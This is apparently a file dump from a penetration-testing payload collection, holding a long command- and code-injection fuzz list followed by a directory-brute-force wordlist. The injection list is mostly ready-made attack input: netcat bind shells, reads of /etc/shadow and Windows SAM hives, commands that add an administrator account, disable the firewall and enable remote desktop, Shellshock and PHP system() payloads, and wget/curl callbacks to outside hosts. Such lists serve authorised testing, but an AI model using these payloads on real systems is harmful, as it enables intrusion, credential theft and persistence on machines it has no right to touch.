111 | eval('pwd')
112 | eval('pwd');
113 | eval('sleep 5')
114 | eval('sleep 5');
115 | eval('whoami')
116 | eval('whoami');
117 | exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
118 | exec('ls')
119 | exec('pwd')
120 | exec('pwd');
121 | exec('sleep 5')
122 | exec('sleep 5');
123 | exec('whoami')
124 | exec('whoami');
125 | ;{$_GET["cmd"]}
126 | `id`
127 | |id
128 | | id
129 | ;id
130 | ;id|
131 | ;id;
132 | & id
133 | &&id
134 | ;id\n
135 | ifconfig
136 | | ifconfig
137 | ; ifconfig
138 | & ifconfig
139 | && ifconfig
140 | /index.html|id|
141 | ipconfig
142 | | ipconfig /all
143 | ; ipconfig /all
144 | & ipconfig /all
145 | && ipconfig /all
146 | ipconfig /all
147 | ls
148 | $(`ls`)
149 | | ls -l /
150 | ; ls -l /
151 | & ls -l /
152 | && ls -l /
153 | ls -l /
154 | | ls -laR /etc
155 | ; ls -laR /etc
156 | & ls -laR /etc
157 | && ls -laR /etc
158 | | ls -laR /var/www
159 | ; ls -laR /var/www
160 | & ls -laR /var/www
161 | && ls -laR /var/www
162 | | ls -l /etc/
163 | ; ls -l /etc/
164 | & ls -l /etc/
165 | && ls -l /etc/
166 | ls -l /etc/
167 | ls -lh /etc/
168 | | ls -l /home/*
169 | ; ls -l /home/*
170 | & ls -l /home/*
171 | && ls -l /home/*
172 | ls -l /home/*
173 | *; ls -lhtR /var/www/
174 | | ls -l /tmp
175 | ; ls -l /tmp
176 | & ls -l /tmp
177 | && ls -l /tmp
178 | ls -l /tmp
179 | | ls -l /var/www/*
180 | ; ls -l /var/www/*
181 | & ls -l /var/www/*
182 | && ls -l /var/www/*
183 | ls -l /var/www/*
184 | <!--#exec cmd="/bin/cat /etc/passwd"-->
185 | <!--#exec cmd="/bin/cat /etc/shadow"-->
186 | <!--#exec cmd="/usr/bin/id;-->
187 | \n
188 | \n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\`
189 | \n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\`
190 | \n/bin/ls -al\n
191 | | nc -lvvp 4444 -e /bin/sh|
192 | ; nc -lvvp 4444 -e /bin/sh;
193 | & nc -lvvp 4444 -e /bin/sh&
194 | && nc -lvvp 4444 -e /bin/sh &
195 | nc -lvvp 4444 -e /bin/sh
196 | nc -lvvp 4445 -e /bin/sh &
197 | nc -lvvp 4446 -e /bin/sh|
198 | nc -lvvp 4447 -e /bin/sh;
199 | nc -lvvp 4448 -e /bin/sh&
200 | \necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n
201 | \necho INJECTX\nexit\n\033[2Asleep 5\n
202 | \necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n
203 | | net localgroup Administrators hacker /ADD
204 | ; net localgroup Administrators hacker /ADD
205 | & net localgroup Administrators hacker /ADD
206 | && net localgroup Administrators hacker /ADD
207 | net localgroup Administrators hacker /ADD
208 | | netsh firewall set opmode disable
209 | ; netsh firewall set opmode disable
210 | & netsh firewall set opmode disable
211 | && netsh firewall set opmode disable
212 | netsh firewall set opmode disable
213 | netstat
214 | ;netstat -a;
215 | | netstat -an
216 | ; netstat -an
217 | & netstat -an
218 | && netstat -an
219 | netstat -an
220 | | net user hacker Password1 /ADD
221 | ; net user hacker Password1 /ADD
222 | & net user hacker Password1 /ADD
223 | && net user hacker Password1 /ADD
224 | net user hacker Password1 /ADD
225 | | net view
226 | ; net view
227 | & net view
228 | && net view
229 | net view
230 | \nid|
231 | \nid;
232 | \nid\n
233 | \n/usr/bin/id\n
234 | perl -e 'print "X"x1024'
235 | || perl -e 'print "X"x16096'
236 | | perl -e 'print "X"x16096'
237 | ; perl -e 'print "X"x16096'
238 | & perl -e 'print "X"x16096'
239 | && perl -e 'print "X"x16096'
240 | perl -e 'print "X"x16384'
241 | ; perl -e 'print "X"x2048'
242 | & perl -e 'print "X"x2048'
243 | && perl -e 'print "X"x2048'
244 | perl -e 'print "X"x2048'
245 | || perl -e 'print "X"x4096'
246 | | perl -e 'print "X"x4096'
247 | ; perl -e 'print "X"x4096'
248 | & perl -e 'print "X"x4096'
249 | && perl -e 'print "X"x4096'
250 | perl -e 'print "X"x4096'
251 | || perl -e 'print "X"x8096'
252 | | perl -e 'print "X"x8096'
253 | ; perl -e 'print "X"x8096'
254 | && perl -e 'print "X"x8096'
255 | perl -e 'print "X"x8192'
256 | perl -e 'print "X"x81920'
257 | || phpinfo()
258 | | phpinfo()
259 |  {${phpinfo()}}
260 | ;phpinfo()
261 | ;phpinfo();//
262 | ';phpinfo();//
263 | {${phpinfo()}}
264 | & phpinfo()
265 | && phpinfo()
266 | phpinfo()
267 | phpinfo();
268 | <?php system("cat /etc/passwd");?>
269 | <?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
270 | <?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj");?>
271 | <?php system("echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");?>
272 | <?php system("sleep 10");?>
273 | <?php system("sleep 5");?>
274 | <?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
275 | <?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc");?>
276 | :phpversion();
277 | `ping 127.0.0.1`
278 | & ping -i 30 127.0.0.1 &
279 | & ping -n 30 127.0.0.1 &
280 | ;${@print(md5(RCEVulnerable))};
281 | ${@print("RCEVulnerable")}
282 | ${@print(system($_SERVER['HTTP_USER_AGENT']))}
283 | pwd
284 | | pwd
285 | ; pwd
286 | & pwd
287 | && pwd
288 | \r
289 | | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
290 | ; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
291 | & reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
292 | && reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
293 | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
294 | \r\n
295 | route
296 | | sleep 1
297 | ; sleep 1
298 | & sleep 1
299 | && sleep 1
300 | sleep 1
301 | || sleep 10
302 | | sleep 10
303 | ; sleep 10
304 | {${sleep(10)}}
305 | & sleep 10 
306 | && sleep 10
307 | sleep 10
308 | || sleep 15
309 | | sleep 15
310 | ; sleep 15
311 | & sleep 15 
312 | && sleep 15
313 |  {${sleep(20)}}
314 | {${sleep(20)}}
315 |  {${sleep(3)}}
316 | {${sleep(3)}}
317 | | sleep 5
318 | ; sleep 5
319 | & sleep 5
320 | && sleep 5
321 | sleep 5
322 |  {${sleep(hexdec(dechex(20)))}} 
323 | {${sleep(hexdec(dechex(20)))}} 
324 | sysinfo
325 | | sysinfo
326 | ; sysinfo
327 | & sysinfo
328 | && sysinfo
329 | ;system('cat%20/etc/passwd')
330 | system('cat C:\boot.ini');
331 | system('cat config.php');
332 | system('cat /etc/passwd');
333 | || system('curl https://crowdshield.com/.testing/rce_vuln.txt');
334 | | system('curl https://crowdshield.com/.testing/rce_vuln.txt');
335 | ; system('curl https://crowdshield.com/.testing/rce_vuln.txt');
336 | & system('curl https://crowdshield.com/.testing/rce_vuln.txt');
337 | && system('curl https://crowdshield.com/.testing/rce_vuln.txt');
338 | system('curl https://crowdshield.com/.testing/rce_vuln.txt')
339 | system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')
340 | system('curl https://sn1persecurity.com/.testing/rce_vuln.txt');
341 | system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
342 | systeminfo
343 | | systeminfo
344 | ; systeminfo
345 | & systeminfo
346 | && systeminfo
347 | system('ls')
348 | system('pwd')
349 | system('pwd');
350 | || system('sleep 5');
351 | | system('sleep 5');
352 | ; system('sleep 5');
353 | & system('sleep 5');
354 | && system('sleep 5');
355 | system('sleep 5')
356 | system('sleep 5');
357 | system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')
358 | system('wget https://sn1persecurity.com/.testing/rce_vuln.txt');
359 | system('whoami')
360 | system('whoami');
361 | test*; ls -lhtR /var/www/
362 | test* || perl -e 'print "X"x16096'
363 | test* | perl -e 'print "X"x16096'
364 | test* & perl -e 'print "X"x16096'
365 | test* && perl -e 'print "X"x16096'
366 | test*; perl -e 'print "X"x16096'
367 | $(`type C:\boot.ini`)
368 | &&type C:\\boot.ini
369 | | type C:\Windows\repair\SAM
370 | ; type C:\Windows\repair\SAM
371 | & type C:\Windows\repair\SAM
372 | && type C:\Windows\repair\SAM
373 | type C:\Windows\repair\SAM
374 | | type C:\Windows\repair\SYSTEM
375 | ; type C:\Windows\repair\SYSTEM
376 | & type C:\Windows\repair\SYSTEM
377 | && type C:\Windows\repair\SYSTEM
378 | type C:\Windows\repair\SYSTEM
379 | | type C:\WINNT\repair\SAM
380 | ; type C:\WINNT\repair\SAM
381 | & type C:\WINNT\repair\SAM
382 | && type C:\WINNT\repair\SAM
383 | type C:\WINNT\repair\SAM
384 | type C:\WINNT\repair\SYSTEM
385 | | type %SYSTEMROOT%\repair\SAM
386 | ; type %SYSTEMROOT%\repair\SAM
387 | & type %SYSTEMROOT%\repair\SAM
388 | && type %SYSTEMROOT%\repair\SAM
389 | type %SYSTEMROOT%\repair\SAM
390 | | type %SYSTEMROOT%\repair\SYSTEM
391 | ; type %SYSTEMROOT%\repair\SYSTEM
392 | & type %SYSTEMROOT%\repair\SYSTEM
393 | && type %SYSTEMROOT%\repair\SYSTEM
394 | type %SYSTEMROOT%\repair\SYSTEM
395 | uname
396 | ;uname;
397 | | uname -a
398 | ; uname -a
399 | & uname -a
400 | && uname -a
401 | uname -a
402 | |/usr/bin/id
403 | ;|/usr/bin/id|
404 | ;/usr/bin/id|
405 | $;/usr/bin/id
406 | () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");'
407 | () { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11
408 | | wget http://crowdshield.com/.testing/rce.txt
409 | & wget http://crowdshield.com/.testing/rce.txt
410 | ; wget https://crowdshield.com/.testing/rce_vuln.txt
411 | $(`wget https://crowdshield.com/.testing/rce_vuln.txt`)
412 | && wget https://crowdshield.com/.testing/rce_vuln.txt
413 | wget https://crowdshield.com/.testing/rce_vuln.txt
414 | $(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
415 | which curl
416 | which gcc
417 | which nc
418 | which netcat
419 | which perl
420 | which python
421 | which wget
422 | whoami
423 | | whoami
424 | ; whoami
425 | ' whoami
426 | ' || whoami
427 | ' & whoami
428 | ' && whoami
429 | '; whoami
430 | " whoami
431 | " || whoami
432 | " | whoami
433 | " & whoami
434 | " && whoami
435 | "; whoami
436 | $(`whoami`)
437 | & whoami
438 | && whoami
439 | {{ get_user_file("C:\boot.ini") }}
440 | {{ get_user_file("/etc/hosts") }}
441 | {{ get_user_file("/etc/passwd") }}
442 | {{4+4}}
443 | {{4+8}}
444 | {{person.secret}}
445 | {{person.name}}
446 | {1} + {1}
447 | {% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
448 | {{[] .__ Class __.__ base __.__ subclasses __ ()}}
449 | 


--------------------------------------------------------------------------------
/FuzzLists/dirbuster-dirs.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/FuzzLists/dirbuster-dirs.txt


--------------------------------------------------------------------------------
/FuzzLists/dirbuster-top1000.txt:
--------------------------------------------------------------------------------
   1 | /
   2 | /admin/
   3 | /search/
   4 | /includes/
   5 | /modules/
   6 | /scripts/
   7 | /xmlrpc.php
   8 | /LICENSE.txt
   9 | /cron.php
  10 | /themes/
  11 | /images/
  12 | /install.php
  13 | /misc/
  14 | /profiles/
  15 | /search
  16 | /comment/reply/
  17 | /update.php
  18 | /node/add/
  19 | /user/password/
  20 | /CHANGELOG.txt
  21 | /user/login/
  22 | /user/register/
  23 | /MAINTAINERS.txt
  24 | /UPGRADE.txt
  25 | /INSTALL.pgsql.txt
  26 | /INSTALL.mysql.txt
  27 | /INSTALL.txt
  28 | /templates/
  29 | /filter/tips/
  30 | /js/
  31 | /api/
  32 | /cache/
  33 | /user/logout/
  34 | /INSTALL.sqlite.txt
  35 | /search.php
  36 | /plugins/
  37 | /install/
  38 | /tmp/
  39 | /tag/
  40 | /language/
  41 | /user/
  42 | /admin
  43 | /logs/
  44 | /media/
  45 | /data/
  46 | /ajax/
  47 | /css/
  48 | /administrator/
  49 | /bin/
  50 | /components/
  51 | /admin.php
  52 | /installation/
  53 | /libraries/
  54 | /checkout/
  55 | /template/
  56 | /config/
  57 | /static/
  58 | /logout/
  59 | /test/
  60 | /login
  61 | /misc.php
  62 | /login/
  63 | /member.php
  64 | /trackback/
  65 | /feed/
  66 | /login.php
  67 | /api.php
  68 | /lib/
  69 | /cli/
  70 | /include/
  71 | /account/
  72 | /source/
  73 | /backup/
  74 | /languages/
  75 | /img/
  76 | /go/
  77 | /index.php
  78 | /stats/
  79 | /profile/
  80 | /connect.php
  81 | /page/
  82 | /contact/
  83 | /app/
  84 | /include
  85 | /m/
  86 | /files/
  87 | /api
  88 | /readme.html
  89 | /internal/
  90 | /libs/
  91 | /download/
  92 | /register.php
  93 | /account
  94 | /checkout
  95 | /newsletter/
  96 | /trackback
  97 | /customer/
  98 | /rss/
  99 | /images
 100 | /3rdparty/
 101 | /register/
 102 | /errors/
 103 | /live/
 104 | /help/
 105 | /upload/
 106 | /ads/
 107 | /assets/
 108 | /cart
 109 | /today/
 110 | /recent/
 111 | /year/
 112 | /week/
 113 | /month/
 114 | /yesterday/
 115 | /searchurl/
 116 | /alltime/
 117 | /wishlist/
 118 | /templets
 119 | /var/
 120 | /forum/
 121 | /mobile/
 122 | /skin/
 123 | /cart/
 124 | /report/
 125 | /temp/
 126 | /plus/count.php
 127 | /users/
 128 | /plus/recommend.php
 129 | /comments/
 130 | /2013/
 131 | /plus/stow.php
 132 | /2012/
 133 | /2011/
 134 | /plus/rss.php
 135 | /auth/
 136 | /print
 137 | /plus/search.php
 138 | /2010/
 139 | /plus/carbuyaction.php
 140 | /2014/
 141 | /xmlrpc/
 142 | /sites/
 143 | /plus/advancedsearch.php
 144 | /plus/erraddsave.php
 145 | /plus/disdls.php
 146 | /plus/car.php
 147 | /inc/
 148 | /plus/posttocar.php
 149 | /mail/
 150 | /feed
 151 | /content/tncms/ads/
 152 | /member/
 153 | /2015/
 154 | /downloader/
 155 | /comments
 156 | /2009/
 157 | /redirect/
 158 | /content/tncms/live/
 159 | /catalogsearch/
 160 | /pkginfo/
 161 | /2008/
 162 | /upvoted/
 163 | /new/yesterday/
 164 | /new/year/
 165 | /new/week/
 166 | /new/today/
 167 | /new/month/
 168 | /downvoted/
 169 | /commented/
 170 | /new/recent/
 171 | /new/alltime/
 172 | /c/
 173 | /gallery/
 174 | /content/
 175 | /secure/
 176 | /user
 177 | /bitrix/
 178 | /2007/
 179 | /index.php/
 180 | /print/
 181 | /2006/
 182 | /statistics.html
 183 | /404/
 184 | /review/
 185 | /poll/
 186 | /ajax
 187 | /members/
 188 | /calendar
 189 | /s/
 190 | /profile.php
 191 | /2002/
 192 | /2003/
 193 | /2001/
 194 | /2005/
 195 | /u/
 196 | /news
 197 | /error/
 198 | /2004/
 199 | /js
 200 | /2000/
 201 | /tools/
 202 | /1999/
 203 | /friendstimes
 204 | /data/foaf/
 205 | /cron.sh
 206 | /report.php
 207 | /private.php
 208 | /newreply.php
 209 | /uploads/
 210 | /newposts/
 211 | /memberlist.php
 212 | /register
 213 | /url
 214 | /newthread.php
 215 | /common/
 216 | /author/
 217 | /upgrade/
 218 | /logout
 219 | /LICENSE.html
 220 | /r/
 221 | /control/
 222 | /usercp.php
 223 | /tags/
 224 | /services/
 225 | /engine/go.php
 226 | /catalog/product/view/
 227 | /feeds/
 228 | /activate/
 229 | /groups
 230 | /weekly/signup
 231 | /system/
 232 | /syndicate
 233 | /gamtarget
 234 | /events/export/
 235 | /adtrack
 236 | /5787254
 237 | /3584794
 238 | /1014943
 239 | /next/
 240 | /catalog/category/view/
 241 | /orders
 242 | /sendfriend/
 243 | /contacts/
 244 | /ajax.php
 245 | /my/
 246 | /editpost.php
 247 | /preferences
 248 | /mshots/v1/
 249 | /category/
 250 | /books/
 251 | /widgets/
 252 | /public.api/
 253 | /online.php
 254 | /buy/
 255 | /apps/
 256 | /pagead/
 257 | /new/
 258 | /includes
 259 | /user.php
 260 | /keyword/
 261 | /install
 262 | /flash/
 263 | /default
 264 | /shell/
 265 | /ct/
 266 | /controls/
 267 | /custom
 268 | /alerts/
 269 | /Admin/
 270 | /toolkit/
 271 | /layouts/
 272 | /forum/search.php
 273 | /places/
 274 | /ebooks/
 275 | /sendmessage.php
 276 | /news/
 277 | /catalogs
 278 | /purchases
 279 | /d/
 280 | /email/
 281 | /conf/
 282 | /center
 283 | /evaluation/
 284 | /univ/
 285 | /test
 286 | /swr
 287 | /palm
 288 | /musicsearch
 289 | /gwt/
 290 | /gcc/
 291 | /blogsearch/
 292 | /a/
 293 | /xfx7/
 294 | /uds/
 295 | /transconsole/portal/
 296 | /tbproxy/
 297 | /squared/table
 298 | /squared/search
 299 | /squared/api
 300 | /sponsoredlinks
 301 | /sidewiki/entry/
 302 | /setprefs
 303 | /scholar
 304 | /safebrowsing
 305 | /s2/profiles/me
 306 | /s2
 307 | /reviews/polls/
 308 | /relpage/
 309 | /relcontent
 310 | /recharge/dashboard/static/
 311 | /recharge/dashboard/car
 312 | /profiles/me
 313 | /pqa
 314 | /orkut/albums
 315 | /nwshp
 316 | /musicsp
 317 | /musics
 318 | /musiclp
 319 | /musicl
 320 | /musicas
 321 | /musicad
 322 | /musica
 323 | /maps/stk/
 324 | /maps/place
 325 | /labs/popgadget/search
 326 | /imgres
 327 | /imglanding
 328 | /imesync/
 329 | /hosted/images/
 330 | /help/maps/streetview/partners/welcome/
 331 | /googlesite
 332 | /customize/
 333 | /cse/panel
 334 | /cse/manage
 335 | /coop/manage
 336 | /coop/directory
 337 | /complete
 338 | /cobrand
 339 | /cl2/ical/
 340 | /cl2/feeds/
 341 | /cbk
 342 | /catalogues
 343 | /call
 344 | /calendar/ical/
 345 | /calendar/feeds/
 346 | /calendar.php
 347 | /browsersync
 348 | /base/reportbadoffer
 349 | /archivesearch/url
 350 | /app/updates
 351 | /adwordsresellers
 352 | /aclk
 353 | /accounts/o8
 354 | /xjs/
 355 | /trustedstores/verify
 356 | /trustedstores/tm2
 357 | /trustedstores/s/
 358 | /travel/clk
 359 | /shopping/suppliers/search
 360 | /shopping/seller
 361 | /shopping/reviewer
 362 | /shopping/product/
 363 | /shihui/
 364 | /sdch
 365 | /sbd
 366 | /patents/related/
 367 | /patents/pdf/
 368 | /patents/download/
 369 | /maps/preview
 370 | /maps/api/js/
 371 | /landing/signout.html
 372 | /hotels/rpc
 373 | /hotelfinder/rpc
 374 | /help/maps/indoormaps/partners/
 375 | /globalmarketfinder/
 376 | /forms/perks/
 377 | /flights/rpc
 378 | /edu/cs4hs/
 379 | /cse/home
 380 | /compressiontest/
 381 | /commercesearch/services/
 382 | /chrome/browser/mobile/tour
 383 | /buzz/post
 384 | /analytics/web/
 385 | /analytics/settings/
 386 | /analytics/reporting/
 387 | /analytics/feeds/
 388 | /analytics/admin/
 389 | /adwords/proposal
 390 | /ads/plan/api/
 391 | /STATUS.txt
 392 | /pdf/
 393 | /engine/download.php
 394 | /accounts/ClientLogin
 395 | /accounts/ClientAuth
 396 | /about/careers/apply/
 397 | /about/careers/applications/
 398 | /ads/hotels/partners
 399 | /maps/api/streetview
 400 | /dekiru/
 401 | /xml/
 402 | /printthread.php
 403 | /profile
 404 | /css
 405 | /downloads/
 406 | /archive/
 407 | /archives/
 408 | /threadrate.php
 409 | /node/
 410 | /personal/
 411 | /subscription.php
 412 | /magento/
 413 | /en/
 414 | /Install/
 415 | /moderator.php
 416 | /dev/
 417 | /captcha.php
 418 | /home/
 419 | /comments/feed/
 420 | /attachment.php
 421 | /Config/
 422 | /cert/
 423 | /topusers/
 424 | /order/
 425 | /submit/
 426 | /demo/
 427 | /contact
 428 | /story.php
 429 | /carts
 430 | /Components/
 431 | /postings.php
 432 | /forum/memberlist.php
 433 | /banners/
 434 | /styles/
 435 | /video/
 436 | /cms/
 437 | /caches
 438 | /registration/
 439 | /region.php
 440 | /log/
 441 | /objects/
 442 | /i/
 443 | /catalog/
